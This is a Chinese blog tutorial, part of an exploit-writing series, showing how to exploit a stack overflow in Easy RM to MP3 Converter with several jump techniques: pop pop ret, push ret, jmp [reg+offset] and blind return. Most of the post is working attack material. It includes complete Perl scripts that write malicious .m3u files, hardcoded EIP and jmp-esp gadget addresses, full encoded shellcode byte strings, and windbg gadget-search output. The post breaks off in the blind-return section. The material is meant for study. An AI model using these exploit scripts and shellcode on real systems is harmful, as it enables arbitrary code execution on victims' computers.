<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="xiaoeryu">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://xiaoeeyu.github.io/2021/05/20/exploit编写系列2：栈溢出，跳转至shellcode/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="exploit编写系列2：栈溢出，跳转至shellcode这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法：  jump&#x2F;call	寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call">
<meta property="og:type" content="article">
<meta property="og:title" content="exploit编写系列2：栈溢出，跳转至shellcode">
<meta property="og:url" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/index.html">
<meta property="og:site_name" content="xiaoeryu">
<meta property="og:description" content="exploit编写系列2：栈溢出，跳转至shellcode这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法：  jump&#x2F;call	寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231000901339-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231004613153-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210102172628709-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210112215736411-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210113231801856-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210129232150356-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210131221051399-1621477705987.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210206000619469-1621477705987.png">
<meta property="article:published_time" content="2021-05-20T02:27:25.000Z">
<meta property="article:modified_time" content="2023-11-17T11:36:43.622Z">
<meta property="article:author" content="xiaoeryu">
<meta property="article:tag" content="exploit编写">
<meta property="article:tag" content="溢出类型漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xiaoeeyu.github.io/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/rabete.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/rabete.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/rabete.jpg">
    <!--- Page Info-->
    
    <title>
        
            exploit编写系列2：栈溢出，跳转至shellcode | xiaoeryu
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"xiaoeeyu.github.io","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":4,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/ball-0101.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-jxl31y.png","dark":"/images/wallhaven-o5762l.png"},"title":"XIAOERYU","subtitle":{"text":["明心见性，拨云见日","Don't wait, to 
create"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/xiaoeeyu","instagram":null,"zhihu":null,"twitter":null,"email":"xiaoeryu@163.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>



<body>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">exploit编写系列2：栈溢出，跳转至shellcode</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/rabete.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">xiaoeryu</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv5</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2021-05-20 10:27:25</span>
        <span class="mobile">2021-05-20 10:27:25</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-11-17 19:36:43</span>
            <span class="mobile">2023-11-17 19:36:43</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Win%E9%80%86%E5%90%91/">Win逆向</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/exploit%E7%BC%96%E5%86%99/">exploit编写</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E6%BA%A2%E5%87%BA%E7%B1%BB%E5%9E%8B%E6%BC%8F%E6%B4%9E/">溢出类型漏洞</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="exploit编写系列2：栈溢出，跳转至shellcode"><a href="#exploit编写系列2：栈溢出，跳转至shellcode" class="headerlink" title="exploit编写系列2：栈溢出，跳转至shellcode"></a>exploit编写系列2：栈溢出，跳转至shellcode</h1><p>这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp</p>
<p>执行shellcode的多种方法：</p>
<ol>
<li>jump/call	寄存器</li>
<li>pop return</li>
<li>push return</li>
<li>jmp[reg + offset]</li>
<li>blind return</li>
<li>jmp code</li>
<li>SEH</li>
<li>call</li>
</ol>
<span id="more"></span>

<hr>
<h3 id="1-jmp-x2F-call-寄存器"><a href="#1-jmp-x2F-call-寄存器" class="headerlink" title="1. jmp/call 寄存器"></a>1. jmp/call 寄存器</h3><p>在第一篇中已经详细分析过</p>
<h3 id="2-pop-pop-ret"><a href="#2-pop-pop-ret" class="headerlink" title="2. pop pop ret"></a>2. pop pop ret</h3><p>这个exp我们依然使用上一篇分析的Easy RM to MP3的漏洞来编写。在上一章使用jmp register编写exp的时候，我们已经能够调整缓冲区，使ESP直接指向我们的shellcode。但是如果shellcode入口发生偏移，比如shellcode的入口位于ESP+8的时候，我们又该怎么去编写exp呢？理论上，当ESP+offset处已经包含shellcode地址时，只有pop ret这种方法才是可行的……如果不是如此（事情往往并非如此），那么也许还有其他方法。</p>
<p>接下来我们尝试采用pop pop ret的方式来重新调整一下shellcode，在上一章的调试中我们已经知道了覆盖EIP需要26067byte，另外在ESP指向的栈地址（0x000ffd38）前还需要4byte。为了模拟出shellcode起始于ESP+8的假象，我们需要构造出一块栈情况如下的缓冲区：</p>
<p>26067xA，XXXX，INT3中断，7NOP，INT3中断，后面放一些NOP。</p>
<p>这样排列我们就可以将真正的shellcode放置于ESP+8后。</p>
<p>先按上面的思路编写一下我们的shellcode</p>
<pre><code class="perl">my $file= "test1.m3u";
my $junk= "A" x 26067;
my $eip = "BBBB"; #overwrite EIP
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\xcc"; #first break
$shellcode = $shellcode . "\x90" x 7; #add 7 more bytes
$shellcode = $shellcode . "\xcc"; #second break
$shellcode = $shellcode . "\x90" x 500; #real shellcode
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>用Easy RM to MP3打开生成的test1.m3u，程序中断之后查看一下堆栈。现在中断于我们填入EIP的“BBBB”处，输入<code>d esp</code>查看一下栈的排列：esp指向0x000ffd38处，里面的内容跟我们刚才编写的代码一致：0xCC + 7个0x90 + 0xCC + 500个0x90（shellcode）</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201229004417938-1621477705987.png" alt="windbg 中 d esp 的输出：esp 指向 0x000ffd38，内容为 0xCC、7 个 0x90、0xCC 及 500 个 0x90" class="" title="image-20201229004417938">

<p>为了让EIP直接跳往ESP+8（我们的payload处），我们需要使用pop ret技术+jmp esp地址来完成此项任务。</p>
<p>一个pop指令会将栈顶弹出四个byte，执行两个pop指令之后ESP就变成了ESP+8（0x000ffd38+8 = 0x000ffd40），此时再执行ret指令就会将ESP（0x000ffd40）处存放的值赋予EIP。如果此时的ESP（0x000ffd40）处存放的是jmp esp指令的地址，那么EIP就会执行jmp esp指令，跳转到ret执行后ESP所指的位置（0x000ffd40之后），这样的话我们就必须把我们的shellcode放置在0x000ffd40后面的缓冲区中。</p>
<p>接下来我们需要先找到一个可用的pop pop ret指令的地址，用这串指令的首地址来覆盖EIP，然后在ESP+8处放入jmp esp指令的地址，再后面紧跟着的就是shellcode了。</p>
<p>重新打开Easy RM to MP3然后使用windbg附加进程，使用windbg的汇编功能来搜索一下 pop pop ret指令的位置</p>
<pre><code>ntdll!DbgBreakPoint:
7c92120e cc              int     3
0:010&gt; a
7c92120e pop eax
pop eax
7c92120f pop ebp
pop ebp
7c921210 ret
ret
7c921211 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e 58              pop     eax
7c92120f 5d              pop     ebp
7c921210 c3              ret
7c921211 ffcc            dec     esp
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
</code></pre>
<p>我们可以查到pop eax, pop ebp, ret三条指令对应的机器码为：0x58 0x5d 0xc3</p>
<p>然后我们可以在加载的DLL里面查找包含这三条指令的地址</p>
<p>重新打开windbg并加载Easy RM to MP3</p>
<p>在加载的DLL里面搜索我们需要的指令。关于DLL的选择：如果应用程序DLL每次加载的基址都相同，就选择应用程序的DLL；如果每次加载的基址都会改变，就选择系统的DLL会更好点。</p>
<p>需要注意的是我们选择的地址尽量不要包含有”00”</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231000901339-1621477705987.png" alt="在加载的DLL中搜索 pop pop ret 指令序列地址的结果" class="" title="image-20201231000901339">

<p>现在我们可以使用上面搜索到的地址让我们跳转到ESP+8，现在我们需要在ESP+8处填入jmp esp的地址（前面解释过，ret指令将从这里获取地址，并将其赋值给EIP执行）。</p>
<p>用同样的方法来搜索一下 jmp esp的地址</p>
<pre><code>0:010&gt; s 01940000 l 019b1000   ff e4
01b7f23a  ff e4 ff 8d 4e 10 c7 44-24 10 ff ff ff ff e8 f3  ....N..D$.......
01bb023f  ff e4 fb 4d 1b a6 9c ff-ff 54 a2 ea 1a d9 9c ff  ...M.....T......
01bcd3db  ff e4 ca b9 01 20 05 93-19 09 00 00 00 00 d4 bc  ..... ..........
01beb22a  ff e4 07 07 f2 01 57 f2-5d 1c d3 e8 09 22 d5 d0  ......W.]...."..
01beb72d  ff e4 09 7d e4 ad 37 df-e7 cf 25 23 c9 a0 4a 26  ...}..7...%#..J&amp;
</code></pre>
<p>此时我们可以将EIP执行到ESP指向的位置了，接下来我们需要用真正的shellcode替换掉原来的500个NOP。</p>
<p>替换后的缓冲区情况如下：</p>
<table>
<thead>
<tr>
<th>AAAAAAAAAAAAAAAAAA…</th>
<th>0x01966a10</th>
<th>NOP NOP</th>
<th>0x01b7f23a</th>
<th>SHELLCODE</th>
</tr>
</thead>
<tbody><tr>
<td>26067</td>
<td>EIP</td>
<td>8 BYTE OFFSET</td>
<td>JMP ESP</td>
<td></td>
</tr>
<tr>
<td></td>
<td>POP POP RET</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<p>现在我们构造的exp执行情况如下：</p>
<ol>
<li>EIP被pop pop ret 指令的地址覆盖，ESP会指向shellcode偏移8字节的地址；</li>
<li>pop pop ret被执行之后，EIP会被ESP+8处的（jmp esp）0x01b7f23a指令覆盖，ESP指向shellcode；</li>
<li>由于EIP被jmp esp指令的地址覆盖，因此程序会跳转到shellcode执行。</li>
</ol>
<pre><code class="perl">my $file= "test3.m3u";
my $junk= "A" x 26067;
my $eip = pack('V',0x01966a10); #overwrite EIP
my $jmpesp = pack('V',0x01b7f23a);
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
#my $shellcode = "\xcc"; #first break
$shellcode = "\x90" x 8; #add 7 more bytes
$shellcode = $shellcode . $jmpesp; #second break

$shellcode = $shellcode . "\x90" x 50; #real shellcode
$shellcode = $shellcode . 
"\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>成功的执行了shellcode弹出了计算器</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20201231004613153-1621477705987.png" alt="shellcode 执行成功，弹出了计算器" class="" title="image-20201231004613153">

<h3 id="3-push-return"><a href="#3-push-return" class="headerlink" title="3. push return"></a>3. push return</h3><p>push ret与call [reg]有些相似，如果有个寄存器指向你的shellcode，但是由于某些原因你无法使用jmp[reg]去跳转到shellcode，可以采用：</p>
<ul>
<li>将寄存器地址压入栈中，它将位于栈顶</li>
<li>ret（从栈中获取返回地址，并跳转到该地址）</li>
</ul>
<p>为了实现这种方法，你需要用某个dll中 push [reg] + ret 指令串的地址去覆盖EIP。如果shellcode直接放在ESP指向的位置，你首先需要搜索‘push esp’和‘ret’的机器码。</p>
<h4 id="0x00-重新运行Easy-RM-to-MP3并用windbg附加"><a href="#0x00-重新运行Easy-RM-to-MP3并用windbg附加" class="headerlink" title="0x00 重新运行Easy RM to MP3并用windbg附加"></a>0x00 重新运行Easy RM to MP3并用windbg附加</h4><p>用windbg的汇编搜索功能来寻找一段<code>push esp</code>&amp;<code>ret</code>指令</p>
<pre><code>0:010&gt; a
7c92120f push esp
push esp
7c921210 ret
ret
7c921211 

0:010&gt; u 7c92120f 
ntdll!DbgBreakPoint+0x1:
7c92120f 54              push    esp
7c921210 c3              ret
7c921211 ffcc            dec     esp
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
7c92121b c20400          ret     4
</code></pre>
<p>可以看到指令对应的机器码为<code>54 c3</code>，然后我们可以从加载的dll里面搜索一条可用的指令地址</p>
<pre><code>0:010&gt; s 01940000 l 019b1000   54 c3
019557f6  54 c3 90 90 90 90 90 90-90 90 8b 44 24 08 85 c0  T..........D$...
01a01d88  54 c3 fe ff 85 c0 74 5d-53 8b 5c 24 30 57 8d 4c  T.....t]S.\$0W.L
01a2cd65  54 c3 8b 87 33 05 00 00-83 f8 06 0f 85 92 01 00  T...3...........
01a2cf2f  54 c3 8b 4c 24 58 8b c6-5f 5e 5d 5b 64 89 0d 00  T..L$X.._^][d...
01a2cf44  54 c3 90 90 90 90 90 90-90 90 90 90 8a 81 da 04  T...............
</code></pre>
<p>选择一个地址，构造exp并运行(直接用call [reg]的exp，将eip修改为我们刚找到的指令地址即可)</p>
<pre><code class="perl">my $file= "test_5.m3u";
my $junk= "A" x 26067;
my $eip = pack('V',0x019557f6); #overwrite EIP with call esp
my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 25; #start shellcode with some NOPS
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>利用成功</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210102172628709-1621477705987.png" alt="push esp + ret 方式利用成功的截图" class="" title="image-20210102172628709">

<h3 id="4-jmp-reg-offset"><a href="#4-jmp-reg-offset" class="headerlink" title="4. jmp [reg + offset]"></a>4. jmp [reg + offset]</h3><p>如果我们的shellcode在寄存器入口处偏移几个字节的位置，也可以用windbg搜索jmp [reg + offset]指令来跳转过去。</p>
<pre><code>0:010&gt; a
7c92120e jmp [esp+8]
jmp [esp+8]
7c921212 u 7c92120e 
u 7c92120e 
        ^ Bad opcode error in 'u 7c92120e '
7c921212 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e ff642408        jmp     dword ptr [esp+8]
ntdll!DbgUserBreakPoint:
7c921212 cc              int     3
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
7c92121b c20400          ret     4
</code></pre>
<p>看结果我们可以知道jmp [esp+8]对应的机器码为<code>ff642408</code>，我们可以尝试在其它的dll中搜索包含这条指令的地址，不过我搜索了几个dll都没有找到这条指令。</p>
<h3 id="5-Blind-return"><a href="#5-Blind-return" class="headerlink" title="5. Blind return"></a>5. Blind return</h3><p>此利用主要用于在ESP寄存器指向地址可用字节数不多的情况下，设置跳板跳往可以足够容纳我们shellcode地址的地方去执行的方法。</p>
<p>此项技术基于以下步骤：</p>
<ul>
<li>利用ret指令地址覆写EIP</li>
<li>在ESP首4字节中对shellcode地址进行硬编码</li>
<li>当ret执行时，新添加的4字节（最顶端的值）将从栈中弹出，并赋予EIP</li>
<li>exploit跳至shellcode执行</li>
</ul>
<p>因此这种方法在以下情况是可用的：</p>
<ul>
<li>无法将EIP直接指向某寄存器（因为无法使用jmp或call指令，这意味着你需要对shellcode起始地址进行硬编码）</li>
<li>可控制ESP中的数据（至少能控制前四字节）</li>
</ul>
<p>如果我们想要实现上面的利用方法：</p>
<ol>
<li>需要拥有shellcode的内存地址（即ESP地址）</li>
<li>在DLL中查找到‘ret’指令的地址</li>
</ol>
<p>先生成一个测试文件来模拟一下堆栈空间</p>
<p>26067个字节A覆盖eip之前的位置+四个字节B覆盖eip + 50个字节的X来作为我们放置跳转指令的地址 + 一段不可用的null</p>
<pre><code class="perl">my $file= "blind_return_1.m3u";
my $junk= "A" x 26067;
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
</code></pre>
<p>A’s地址距离ESP的偏移</p>
